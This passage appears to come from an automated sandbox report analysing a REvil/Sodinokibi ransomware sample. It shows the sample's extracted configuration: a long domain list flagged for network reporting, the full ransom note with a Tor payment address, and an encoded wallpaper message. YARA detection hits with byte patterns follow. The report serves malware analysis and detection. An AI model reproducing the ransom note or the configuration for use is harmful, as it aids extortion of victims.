tilisacteur.fr;malzomattalar.com;almamidwifery.com;dreamvoiceclub.org;cl0nazepamblog.com;avisioninthedesert.com;condormobile.fr;ultimatelifesource.com;bratek-immobilien.de;jax-interim-and-projectmanagement.com;anchelor.com;mike.matthies.de;rattanwarehouse.co.uk;business-basic.de;successcolony.com.ng;taulunkartano.fi;mjk.digital;techybash.com;acumenconsultingcompany.com;docarefoundation.org;amelielecompte.wordpress.com;galatee-couture.com;lmmont.sk;saboboxtel.uk;acornishstudio.co.uk;focuskontur.com;craftstone.co.nz;buerocenter-butzbach-werbemittel.de;fluzfluzrewards.com;rubyaudiology.com;marcandy.com;modamarfil.com;shortysspices.com;bavovrienden.nl;silkeight.com;selected-minds.de;fbmagazine.ru;forextimes.ru;rapid5kloan.org;trivselsguide.dk;epsondriversforwindows.com;sambaglow.com;margaretmcshane.com;tothebackofthemoon.com;azloans.com;mgimalta.com;bubbalucious.com;kellengatton.com;nevadaruralhousingstudies.org;spacebel.be;gatlinburgcottage.com;peninggibadan.co.id;mayprogulka.ru;midwestschool.org;edrickennedymacfoy.com;nykfdyrehospital.dk;sprintcoach.com;irizar.com;dieetuniversiteit.nl;mollymccarthydesign.com;bluetenreich-brilon.de;lumturo.academy;acb-gruppe.ch;angeleyezstripclub.com;augen-praxisklinik-rostock.de;arearugcleaningnyc.com;aoyama.ac;forumsittard.nl;outstandingminialbums.com;arthakapitalforvaltning.dk;bumbipdeco.site;agencewho-aixenprovence.fr;pureelements.nl;yourhappyevents.fr;towelroot.co;ownidentity.com;kenmccallum.com;voetbalhoogeveen.nl;jmmartinezilustrador.com;palema.gr;stoneridgemontessori.com;keuken-prijs.nl;g2mediainc.com;satoblog.org;inewsstar.com;ninjaki.com;metallbau-hartmann.eu;terraflair.de;agrifarm.dk;scietech.academy;goodboyscustom.com;johnstonmingmanning.com;greeneyetattoo.com;nvisionsigns.com;thehovecounsellingpractice.co.uk;nauticmarine.dk;karelinjames.com;o2o-academy.com;vedsegaard.dk;boomerslivinglively.com;thegetawaycollective.com;90nguyentuan.com;cesep2019.com;craftingalegacy.com;amorbellezaysalud.com;memphishealthandwellness.com;carolynfriedlander.com;paardcentraal.nl;smarttourism.academy;ingresosextras.online;kombi-dress.com;blueridgeheritage.com;ntinasfiloxenia.gr;zwemofficial.nl;gavelmasters.com;hostaletdelsindians.es;jefersonalessandro.com;opt4cdi.com;cap29010.it;tesisatonarim.com;eventosvirtualesexitosos.com;strauchs-wanderlust.info;denverwynkoopdentist.com;hutchstyle.co.uk;krishnabrawijaya.com;globalcompliancenews.com;imaginekithomes.co.nz;skyboundnutrition.co.uk;stringnosis.academy;fysiotherapierijnmond.nl;rolleepollee.com;mrcar.nl;goddardleadership.org;geitoniatonaggelon.gr;cops4causes.org;chris-anne.com;bayshoreelite.com;imagine-entertainment.com;oscommunity.de;fanuli.com.au;jayfurnitureco.com;mindsparkescape.com;crestgood.com;bulyginnikitav.000webhostapp.com;thisprettyhair.com;cyberpromote.de;marmarabasin.com;gazelle-du-web.com;tetameble.pl;zumrutkuyutemel.com;hepishopping.com;brannbornfastigheter.se;wribrazil.com;heuvelland-oaze.nl;dibli.store;k-zubki.ru;pays-saint-flour.fr;dinecorp.com;khtrx.com;maryairbnb.wordpress.com;artvark.nl;richardmaybury.co.uk;circlecitydj.com;makingmillionaires.net;comoserescritor.com;efficiencyconsulting.es;rivermusic.nl;chomiksy.net;jag.me;photonag.com;ravage-webzine.nl;studionumerik.fr;parentsandkids.com;verbouwingsdouche.nl;charlesfrancis.photos;natturestaurante.com.br;goodherbalhealth.com;linearete.com;bychowo.pl;aidanpublishing.co.uk;schlagbohrmaschinetests.com;buffdaddyblog.com;mindfuelers.com;optigas.com;biketruck.de;envomask.com;welovecustomers.fr;andreaskildegaard.dk;haus-landliebe.de;christianscholz.de;jobscore.com;subyard.com;cincinnatiphotocompany.org;bjornvanvulpen.nl;xn--80abehgab4ak0ddz.xn--p1ai;lookandseen.com;thesilkroadny.com;eatyoveges.com;muller.nl;hospitalitytrainingsolutions.co.uk;markseymourphotography.co.uk;claudiakilian.de;2020hindsight.info;victorvictoria.com;elitkeramika-shop.com.ua;turing.academy;aceroprime.com;animalfood-online.de;leijstrom.com;kamin-somnium.de;ziliak.com;werkzeugtrolley.net;csaballoons.com;enactusnhlstenden.com;atrgroup.it;c-sprop.com;enews-qca.com;michaelfiegel.com;theatre-embellie.fr;mercadodelrio.com;adaduga.info;magrinya.net;ramirezprono.com;landgoedspica.nl;a-zpaperwork.eu;grancanariaregional.com;bridalcave.com;global-migrate.com;michal-s.co.il;omnicademy.com;holocine.de;sellthewrightway.com;magnetvisual.com;lexced.com;hostastay.com;kosten-vochtbestrijding.be;tastevirginia.com;gbk-tp1.de;oraweb.net;designimage.ae;trevi-vl.ru;futurenetworking.com;banksrl.co.za;fixx-repair.com;hotjapaneselesbian.com;afbudsrejserallinclusive.dk;breakluckrecords.com;endstarvation.com;kroophold-sjaelland.dk;heimdalbygg.no;broccolisoep.nl;uci-france.fr;fsbforsale.com;achetrabalhos.com;xn--80addfr4ahr.dp.ua;istantidigitali.com;eurethicsport.eu;alabamaroofingllc.com;biblica.com;bagaholics.in;hom-frisor.dk;devplus.be;koncept-m.ru;guohedd.com;latteswithleslie.com;mediahub.co.nz;photographycreativity.co.uk;burg-zelem.de;pokemonturkiye.com;frankgoll.com;bluemarinefoundation.com;renderbox.ch;kerstliedjeszingen.nl;operativadigital.com;physio-lang.de;annida.it;mursall.de;bescomedical.de;cc-experts.de;awaitspain.com;alpesiberie.com;piestar.com;kdbrh.com;groovedealers.ru;watchsale.biz;directique.com;kompresory-opravy.com;transifer.fr;affligemsehondenschool.be;autoteamlast.de;nrgvalue.com;duthler.nl;aslog.fr;nutriwell.com.sg;spectamarketingdigital.com.br;amco.net.au;tweedekansenloket.nl;ahgarage.com;askstaffing.com;justaroundthecornerpetsit.com;the-beauty-guides.com;sycamoregreenapts.com;latableacrepes-meaux.fr;belinda.af;solidhosting.nl;topautoinsurers.net;pvandambv.nl;forskolinslimeffect.net;pharmeko-group.com;cuadc.org;sharonalbrightdds.com;cardsandloyalty.com;tchernia-conseil.fr;opticahubertruiz.com;adterium.com;myplaywin3.com;blavait.fr;mediogiro.com.ar;ivancacu.com;kookooo.com;mazift.dk;livedeveloper.com;curtsdiscountguns.com;lyricalduniya.com;jlgraphisme.fr;creohn.de;vapiano.fr;lollachiro.com;t3brothers.com;rizplakatjaya.com;four-ways.com;polynine.com;ox-home.com;levelseven.be;raeoflightmusic.com;teutoradio.de;circuit-diagramz.com;lapponiasafaris.com;citiscapes-art.com;apogeeconseils.fr;the3-week-diet.net;brighthillgroup.com;mariannelemenestrel.com;soundseeing.net;randyabrown.com;queertube.net;eos-horlogerie.com;martha-frets-ceramics.nl;molinum.pt;qandmmusiccenter.com;explora.nl;profiz.com;ayudaespiritualtamara.com;cssp-mediation.org;collegetennis.info;mieleshopping.it;atelierkomon.com;fla.se;jobkiwi.com.ng;gratiocafeblog.wordpress.com;lifeinbreaths.com;naukaip.ru;zaczytana.com;n-newmedia.de;campusce.com;beauty-traveller.com;linkbuilding.life;bundan.com;greatofficespaces.net;ikzoekgod.be;allinonecampaign.com;radishallgood.com;bookingwheel.com;specialtyhomeservicesllc.com;alisodentalcare.com;oportowebdesign.com;whoopingcrane.com;pilotgreen.com;neonodi.be;omegamarbella.com;kiraribeaute-nani.com;newonestop.com;motocrossplace.co.uk;pubcon.com;riffenmattgarage.ch;theboardroomafrica.com;glennverschueren.be;fazagostar.co;atma.nl;lisa-poncon.fr;projektparkiet.pl;jandhpest.com;andrealuchesi.it;galaniuklaw.com;digitale-elite.de;ketomealprep.academy;cormanmarketing.com;nginx.com;fotoeditores.com;1deals.com;11.in.ua;flossmoordental.com;orchardbrickwork.com;glende-pflanzenparadies.de;alwaysdc.com;cleanroomequipment.ie;janellrardon.com;ddmgen.com;ruggestar.ch;ncn.nl;campinglaforetdetesse.com;ziliak.com;thegrinningmanmusical.com;ilveshistoria.com;customroasts.com;bluelakevision.com;oexebusiness.com;asiaartgallery.jp;vitormmcosta.com;metcalfe.ca;palmecophilippines.com;mariamalmahdi.com;hawaiisteelbuilding.com;olry-cloisons.fr;vitoriaecoturismo.com.br;bakingismyyoga.com;myfbateam.com;onesynergyinternational.com;webforsites.com;zdrowieszczecin.pl;premier-iowa.com;wordpress.idium.no;nieuwsindeklas.be;dcc-eu.com;drbrianhweeks.com;innersurrection.com;hm-com.com;test-teleachat.fr;letterscan.de;mangimirossana.it;o90.dk;mensemetgesigte.co.za;stitch-n-bitch.com;easydental.ae;ijsselbeton.nl;palmenhaus-erfurt.de;mundo-pieces-auto.fr;birthplacemag.com;fridakids.com;juergenblaetz.de;ziliak.com;sealgrinderpt.com;finnergo.eu;energosbit-rp.ru;trainiumacademy.com;epicjapanart.com;signamedia.de;profibersan.com;tellthebell.website;springfieldplumbermo.com;larchwoodmarketing.com;suitesartemis.gr;bertbutter.nl;medicalsupportco.com;molade.nl;mondolandscapes.com;alexwenzel.de;drbenveniste.com;boloria.de;aheadloftladders.co.uk;stage-infirmier.fr;dantreranch.com;citydogslife.com;johnkoen.com;sachainchiuk.com;sshomme.com;initconf.com;martinipstudios.com;skooppi.fi;catering.com;saint-malo-developpement.fr;mariajosediazdemera.com;campusescalade.com;uncensoredhentaigif.com;auto-opel.ro;dennisverschuur.com;berdonllp.com;maxcube24.com.ua;pinthelook.com;advanced-removals.co.uk;jacquesgarcianoto.com;ced-elec.com;sochi-okna23.ru;pansionatblago.ru;malevannye.ru;banukumbak.com;rozmata.com;fascaonline.com;bcmets.info;mslp.org;perfectgrin.com;tramadolhealth.com;clinic-beethovenstrasse-ag.ch;skyscanner.ro;bodymindchallenger.com;rokthetalk.com;furland.ru;datatri.be;traitware.com;chorusconsulting.net;akwaba-safaris.com;avis.mantova.it;thepixelfairy.com;patassociation.com;factorywizuk.com;muni.pe;manzel.tn;iron-mine.ru;julielusktherapy.com;3daywebs.com;weddingceremonieswithtim.com;onlinetvgroup.com;billyoart.com;colored-shelves.com;tzn.nu;annenymus.com;xtensifi.com;finsahome.co.uk;narca.net;prodentalblue.com;centuryvisionglobal.com;hawthornsretirement.co.uk;wyreforest.net;simpleitsolutions.ch;foerderverein-vatterschule.de;reygroup.pt;ideamode.com;lashandbrowenvy.com;tutvracks.com;thestudio.academy;stanleyqualitysystems.com;ledyoucan.com;entdoctor-durban.com;goeppinger-teppichreinigung.de;parksideseniorliving.net;aciscomputers.com;cascinarosa33.it;apmollerpension.com;triplettabordeaux.fr;cymru.futbol;miscbo.it;licensed-public-adjuster.com;arabianmice.com;speakaudible.com;littlesaints.academy;nourella.com;deziplan.ru;hostingbangladesh.net;frameshift.it;protoplay.ca;min-virksomhed.dk;direitapernambuco.com;harleystreetspineclinic.com;redpebblephotography.com;beandrivingschool.com.au;stathmoulis.gr;happycatering.de;netadultere.fr;mustangmarketinggroup.com;evsynthacademy.org;m2graph.fr;site.markkit.com.br;arazi.eus;stressreliefadvice.com;internestdigital.com;wasnederland.nl;domilivefurniture.com;der-stempelking.de;5thactors.com;hoteltantra.com;boyfriendsgoal.site;bendel-partner.de;paradigmlandscape.com;nexstagefinancial.com;zinnystar.com;professionetata.com;happylublog.wordpress.com;moira-cristescu.com;rhino-storage.co.uk;carsten.sparen-it.de;die-immo-agentur.de;nalliasmali.net;lovcase.com;factoriareloj.com;sweetz.fr;bodet150ans.com;qwikcoach.com;schroederschoembs.com;tages-geldvergleich.de;glas-kuck.de;fotoslubna.com;azerbaycanas.com;bohrlochversicherung.info;laaisterplakky.nl;production-stills.co.uk;scotlandsroute66.co.uk;shrinkingplanet.com;agendatwentytwenty.com;spirello.nl;singletonfinancial.com;kryddersnapsen.dk;girlish.ae;levencovka.ru;nationnewsroom.com;santastoy.store;cp-bap.de;ocduiblog.com;andermattswisswatches.ch;pinkxgayvideoawards.com;descargandoprogramas.com;apiarista.de;5pointpt.com;lgiwines.com;rossomattonecase.it;powershell.su;premiumweb.com.ua:443;oro.ae;ikadomus.com;ygallerysalonsoho.com:443;ronielyn.com;brisbaneosteopathic.com.au;pourlabretagne.bzh;metroton.ru;richardiv.com;putzen-reinigen.com;metriplica.academy;fitnessblenderstory.com;lassocrm.com;hensleymarketing.com;b3b.ch;louiedager.com;yvesdoin-aquarelles.fr;nicksrock.com;log-barn.co.uk;scentedlair.com;xrresources.com;promus.ca;logosindustries.com;airvapourbarrier.com;sppdstats.com;rhino-turf.com;catchup-mag.com;noda.com.ua;motocrosshideout.com;fta-media.com;tbalp.co.uk;brunoimmobilier.com;valiant-voice.com;leopoldineroux.com;loysonbryan.com;schulz-moelln.de;geoweb.software;eksperdanismanlik.com;artcase.pl;tatyanakopieva.ru;jdscenter.com;ruggestar.ch;elex.is;tilldeeke.de;ncjc.ca;framemyballs.com;alltagsrassismus-entknoten.de;christopherhannan.com;yuanshenghotel.com;prometeyagro.com.ua;albcleaner.fr;smartmind.net;xn--ziinoapte-6ld.ro;gosouldeep.com;reizenmetkinderen.be;mrmac.com;airserviceunlimited.com;globalskills.pt;nuohous.com;gsconcretecoatings.com;ykobbqchicken.ca;yourcosmicbeing.com;greenrider.nl;internalresults.com;subquercy.fr;liverpoolabudhabi.ae;the5thquestion.com;osn.ro;tanatek.com;nepressurecleaning.com;universelle.fr;jameswilliamspainting.com;nxtstg.org;elliemaccreative.wordpress.com;witraz.pl;rechtenplicht.be;agriturismocastagneto.it;antesacademy.it;encounter-p.net;primemarineengineering.com;sveneulberg.de;texanscan.org;sarahspics.co.uk;rename.kz;leloupblanc.gr;ceocenters.com;perceptdecor.com;luvbec.com;salonlamar.nl;kvetymichalovce.sk;qrs-international.com;janasfokus.com;topvijesti.net;worldproskitour.com;wineandgo.hu;hameghlim.com;line-x.co.uk;mikegoodfellow.co.uk;tradenavigator.ch;indiebizadvocates.org;rvside.com;clemenfoto.dk;stabilisateur.fr;belofloripa.be;tecleados.com;bd2fly.com;gardenpartner.pl;hvitfeldt.dk;teamsegeln.ch;angelika-schwarz.com;suonenjoen.fi;kartuindonesia.com;startuplive.org;parseport.com;agenceassemble.fr;altitudeboise.com;egpu.fr;anleggsregisteret.no;bellesiniacademy.org;sjtpo.org;kafkacare.com;adedesign.com;haard-totaal.nl;saberconcrete.com;rishigangoly.com;alattekniksipil.com;vdolg24.online;dentourage.com;billscars.net;devus.de;dogsunlimitedguide.com;dentalcircle.com;astrographic.com;wademurray.com;bourchier.org;alene.co;bruut.online;jaaphoekzema.nl;limounie.com;slideevents.be;mind2muscle.nl;hypogenforensic.com;cainlaw-okc.com;mbuildinghomes.com;carmel-york.com;edvestors.org;unislaw-narty.pl;from02pro.com;cotton-avenue.co.il;speiserei-hannover.de;dierenambulancealkmaar.nl;slotenmakerszwijndrecht.nl;interlinkone.com;breathebettertolivebetter.com;triplettagaite.fr;itheroes.dk;bringmehope.org;ya-elka.ru;advancedeyecare.com;ebible.co;bg.szczecin.pl;solutionshosting.co.uk;skidpiping.de;mediabolmong.com;vipcarrental.ae;zorgboerderijravensbosch.nl;luvinsburger.fr;altocontatto.net;leatherjees.com;masecologicos.com;kristianboennelykke.dk;teethinadaydentalimplants.com;phukienbepthanhdat.com", "net": true, "nbody": "---=== Welcome. Again. ===---\r\n\r\n[+] Whats Happen? [+]\r\n\r\nYour files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}.\r\nBy the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).\r\n\r\n[+] What guarantees? [+]\r\n\r\nIts just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.\r\nTo check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.\r\nIf you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.\r\n\r\n[+] How to get access on website? [+]\r\n\r\nYou have two ways:\r\n\r\n1) [Recommended] Using a TOR browser!\r\n  a) Download and install TOR browser from this site: https://torproject.org/\r\n  b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}\r\n\r\n2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:\r\n  a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)\r\n  b) Open our secondary website: http://decryptor.top/{UID}\r\n\r\nWarning: secondary website can be blocked, thats why first variant much better and more available.\r\n\r\nWhen you open our website, put the following data in the input form:\r\nKey:\r\n\r\n{KEY}\r\n\r\n\r\nExtension name:\r\n\r\n{EXT}\r\n\r\n-----------------------------------------------------------------------------------------\r\n\r\n!!! DANGER !!!\r\nDONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.\r\n!!! !!! !!!\r\nONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.\r\n!!! !!! !!!\u0000", "nname": "{EXT}-readme.txt", "exp": false, "img": "QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
RQzHm5vLxs.exe	JoeSecurity_Revil	Yara detected Revil	Joe Security
RQzHm5vLxs.exe	Windows_Ransomware_Sodinokibi_83f05fbe	Identifies SODINOKIBI/REvil ransomware	unknown	0x84bc:$d1: 03 C0 01 47 30 11 4F 34 01 57 30 8B 57 78 8B C2 11 77 34 8B 77 7C 8B CE 0F A4 C1 04 C1 E0 04 01 47 28 8B C2 11 4F 2C 8B CE 0F A4 C1 01 03 C0 01 47 28 11 4F 2C 01 57 28 8B 57 70 8B C2 11 77 2C ... 0x17340:$d2: 65 78 70 61 6E 64 20 33 32 2D 62 79 74 65 20 6B 65 78 70 61 6E 64 20 31 36 2D 62 79 74 65 20 6B 0x81f6:$d3: F7 6F 38 03 C8 8B 43 48 13 F2 F7 6F 20 03 C8 8B 43 38 13 F2 F7 6F 30 03 C8 8B 43 40 13 F2 F7 6F 28 03 C8 8B 43 28 13 F2 F7 6F 40 03 C8 8B 45 08 13 F2 89 48 68 89 70 6C 8B 43 38 F7 6F 38 8B C8 ... 0x917b:$d4: 33 C0 8B 5A 68 8B 52 6C 0F A4 FE 08 C1 E9 18 0B C6 C1 E7 08 8B 75 08 0B CF 89 4E 68 8B CA 89 46 6C 33 C0 8B 7E 60 8B 76 64 0F A4 DA 19 C1 E9 07 0B C2 C1 E3 19 8B 55 08 0B CB 89 4A 60 8B CF 89 ... 0x8e9c:$d5: C1 01 C1 EE 1F 0B D1 03 C0 0B F0 8B C2 33 43 24 8B CE 33 4B 20 33 4D E4 33 45 E0 89 4B 20 8B CB 8B 5D E0 89 41 24 8B CE 33 4D E4 8B C2 31 4F 48 33 C3 8B CF 31 41 4C 8B C7 8B CE 33 48 70 8B C2 ... 0x8071:$d6: 8B 43 40 F7 6F 08 03 C8 8B 03 13 F2 F7 6F 48 03 C8 8B 43 48 13 F2 F7 2F 03 C8 8B 43 08 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 18 03 C8 8B 43 18 13 F2 F7 6F 30 03 C8 8B 43 38 13 F2 F7 6F 10 ... 0x8e09:$d7: 8B CE 33 4D F8 8B C2 33 C3 31 4F 18 8B CF 31 41 1C 8B C7 8B CE 33 48 40 8B C2 33 4D F8 33 47 44 89 4F 40 33 C3 8B CF 89 41 44 8B C7 8B CE 33 48 68 8B C2 33 47 6C 33 4D F8 33 C3 89 4F 68 8B CF ... 0x19e00:$d8: 36 7D 49 30 85 35 C2 C3 68 60 4B 4B 7A BE 83 53 AB E6 8E 42 F9 C6 62 A5 D0 6A AD C6 F1 7D F6 1D 79 CD 20 FC E7 3E E1 B8 1A 43 38 12 C1 56 28 1A 04 C9 22 55 E0 D7 08 BB 9F 0B 1F 1C B9 13 06 35 0x926c:$d9: C2 C1 EE 03 8B 55 08 0B CE 89 4A 4C 8B CF 89 42 48 33 C0 8B 72 30 8B 52 34 C1 E9 0C 0F A4 DF 14 0B C7 C1 E3 14 8B 7D 08 0B CB 89 4F 30 8B CE 89 47 34 33 C0 C1 E1 0C 0F AC D6 14 0B C6 C1 EA 14 ... 0x819c:$d10: 8B F2 8B 43 38 F7 6F 28 03 C8 8B 43 18 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 38 03 C8 8B 43 40 13 F2 F7 6F 20 0F A4 CE 01 03 C9 03 C8 8B 43 20 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 30 ... 0x8c65:$d11: 33 45 FC 31 4B 28 8B CB 31 41 2C 8B CE 8B C3 33 48 50 8B C2 33 43 54 33 CF 33 45 FC 89 4B 50 8B CB 89 41 54 8B CE 8B C3 33 48 78 8B C2 33 43 7C 33 CF 33 45 FC 89 4B 78 8B CB 89 41 7C 33 B1 A0 0x90e5:$d12: 52 24 0F A4 FE 0E C1 E9 12 0B C6 C1 E7 0E 8B 75 08 0B CF 89 4E 20 8B CA 89 46 24 33 C0 8B 7E 78 8B 76 7C 0F A4 DA 1B C1 E9 05 0B C2 C1 E3 1B 8B 55 08 0B CB 89 4A 78 8B CF 89 42 7C 33 C0 8B 9A 0x8144:$d13: F2 8B 43 38 F7 6F 20 03 C8 8B 43 40 13 F2 F7 6F 18 03 C8 8B 43 10 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 30 03 C8 8B 43 20 13 F2 F7 6F 38 03 C8 8B 43 30 13 F2 F7 6F 28 03 C8 8B 43 48 13 F2 0x88b7:$d14: 8B 47 30 13 F2 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 74 03 C9 89 4B 70 8B 47 30 F7 6F 48 8B C8 8B F2 8B 47 38 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 7C 03 C9 89 4B 78 8B 47 38 F7 6F 48 8B C8
RQzHm5vLxs.exe	Windows_Ransomware_Sodinokibi_a282ba44	Identifies SODINOKIBI/REvil ransomware	unknown	0x3db0:$c3: 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83 0x497c:$c4: 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF 0x5b27:$c5: FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55 0x8e8c:$c6: BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F 0x948e:$c7: 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89 0xa526:$c8: 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B
RQzHm5vLxs.exe	REvil	REvil Payload	R3MRUM	0x17340:$RE1: expand 32-byte kexpand 16-byte k 0xba30:$RE2: sysshadow 0x105f8:$RE2: sysshadow 0x14270:$RE2: sysshadow 0xba50:$RE3: SCROLLBAR 0x10610:$RE3: SCROLLBAR 0x14288:$RE3: SCROLLBAR 0xba40:$RE4: msctfime ui 0x10604:$RE4: msctfime ui 0x1427c:$RE4: msctfime ui 0xba60:$RE5: \BaseNamedObjects\%S 0x1061c:$RE5: \BaseNamedObjects\%S 0x14294:$RE5: \BaseNamedObjects\%S 0x4d34:$decode: 33 D2 8A 9C 3D FC FE FF FF 8B C7 0F B6 CB F7 75 0C 8B 45 08 0F B6 04 02 03 C6 03 C8 0F B6 F1 8A 84 35 FC FE FF FF 88 84 3D FC FE FF FF 47 88 9C 35 FC FE FF FF 81 FF 00 01 00 00 72 C3

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp	Windows_Ransomware_Sodinokibi_a282ba44	Identifies SODINOKIBI/REvil ransomware	unknown	0x39b0:$c3: 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83 0x457c:$c4: 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF 0x5727:$c5: FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55 0x8a8c:$c6: BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F 0x908e:$c7: 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89 0xa126:$c8: 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B
00000000.00000000.1664633895.0000000000D91000.00000020.00000001.01000000.00000003.sdmp	Windows_Ransomware_Sodinokibi_a282ba44	Identifies SODINOKIBI/REvil ransomware	unknown	0x39b0:$c3: 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83 0x457c:$c4: 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF 0x5727:$c5: FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55 0x8a8c:$c6: BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F 0x908e:$c7: 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89 0xa126:$c8: 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B
Process Memory Space: RQzHm5vLxs.exe PID: 6232	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
Process Memory Space: RQzHm5vLxs.exe PID: 6232	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
Process Memory Space: RQzHm5vLxs.exe PID: 6232	JoeSecurity_Chaos	Yara detected Chaos Ransomware	Joe Security
Process Memory Space: RQzHm5vLxs.exe PID: 6232	JoeSecurity_Netwalker	Yara detected Netwalker ransomware	Joe Security
Process Memory Space: RQzHm5vLxs.exe PID: 6232	JoeSecurity_Sodinokibi	Yara detected Sodinokibi Ransomware	Joe Security
Process Memory Space: RQzHm5vLxs.exe PID: 6232	JoeSecurity_TrojanRansom	Yara detected TrojanRansom	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.RQzHm5vLxs.exe.d90000.0.unpack	JoeSecurity_Revil	Yara detected Revil	Joe Security
0.0.RQzHm5vLxs.exe.d90000.0.unpack	Windows_Ransomware_Sodinokibi_83f05fbe	Identifies SODINOKIBI/REvil ransomware	unknown	0x84bc:$d1: 03 C0 01 47 30 11 4F 34 01 57 30 8B 57 78 8B C2 11 77 34 8B 77 7C 8B CE 0F A4 C1 04 C1 E0 04 01 47 28 8B C2 11 4F 2C 8B CE 0F A4 C1 01 03 C0 01 47 28 11 4F 2C 01 57 28 8B 57 70 8B C2 11 77 2C ... 0x17340:$d2: 65 78 70 61 6E 64 20 33 32 2D 62 79 74 65 20 6B 65 78 70 61 6E 64 20 31 36 2D 62 79 74 65 20 6B 0x81f6:$d3: F7 6F 38 03 C8 8B 43 48 13 F2 F7 6F 20 03 C8 8B 43 38 13 F2 F7 6F 30 03 C8 8B 43 40 13 F2 F7 6F 28 03 C8 8B 43 28 13 F2 F7 6F 40 03 C8 8B 45 08 13 F2 89 48 68 89 70 6C 8B 43 38 F7 6F 38 8B C8 ... 0x917b:$d4: 33 C0 8B 5A 68 8B 52 6C 0F A4 FE 08 C1 E9 18 0B C6 C1 E7 08 8B 75 08 0B CF 89 4E 68 8B CA 89 46 6C 33 C0 8B 7E 60 8B 76 64 0F A4 DA 19 C1 E9 07 0B C2 C1 E3 19 8B 55 08 0B CB 89 4A 60 8B CF 89 ... 0x8e9c:$d5: C1 01 C1 EE 1F 0B D1 03 C0 0B F0 8B C2 33 43 24 8B CE 33 4B 20 33 4D E4 33 45 E0 89 4B 20 8B CB 8B 5D E0 89 41 24 8B CE 33 4D E4 8B C2 31 4F 48 33 C3 8B CF 31 41 4C 8B C7 8B CE 33 48 70 8B C2 ... 0x8071:$d6: 8B 43 40 F7 6F 08 03 C8 8B 03 13 F2 F7 6F 48 03 C8 8B 43 48 13 F2 F7 2F 03 C8 8B 43 08 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 18 03 C8 8B 43 18 13 F2 F7 6F 30 03 C8 8B 43 38 13 F2 F7 6F 10 ... 0x8e09:$d7: 8B CE 33 4D F8 8B C2 33 C3 31 4F 18 8B CF 31 41 1C 8B C7 8B CE 33 48 40 8B C2 33 4D F8 33 47 44 89 4F 40 33 C3 8B CF 89 41 44 8B C7 8B CE 33 48 68 8B C2 33 47 6C 33 4D F8 33 C3 89 4F 68 8B CF ... 0x19e00:$d8: 36 7D 49 30 85 35 C2 C3 68 60 4B 4B 7A BE 83 53 AB E6 8E 42 F9 C6 62 A5 D0 6A AD C6 F1 7D F6 1D 79 CD 20 FC E7 3E E1 B8 1A 43 38 12 C1 56 28 1A 04 C9 22 55 E0 D7 08 BB 9F 0B 1F 1C B9 13 06 35 0x926c:$d9: C2 C1 EE 03 8B 55 08 0B CE 89 4A 4C 8B CF 89 42 48 33 C0 8B 72 30 8B 52 34 C1 E9 0C 0F A4 DF 14 0B C7 C1 E3 14 8B 7D 08 0B CB 89 4F 30 8B CE 89 47 34 33 C0 C1 